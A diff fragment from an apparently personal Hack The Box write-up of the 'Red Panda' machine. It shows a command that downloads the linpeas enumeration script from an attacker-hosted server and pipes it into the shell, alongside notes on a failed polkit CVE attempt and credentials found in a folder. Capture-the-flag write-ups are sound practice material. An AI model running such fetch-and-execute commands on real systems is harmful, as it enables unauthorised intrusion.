Rogue-1/HTB/FullPWN/Red Panda.md

 ```console
 curl http://10.10.14.30:8000/linpeas.sh | sh
 ```
-I tried for awhile on the CVE that is polkit but I wasnt having any luck.
+I tried for awhile on the CVE but I wasnt having any luck.
 I didn't even try the others but maybe there was a vector in there somewhere.

 in the credits folder we can see credentials but as the user woodenk I wasnt able to access it.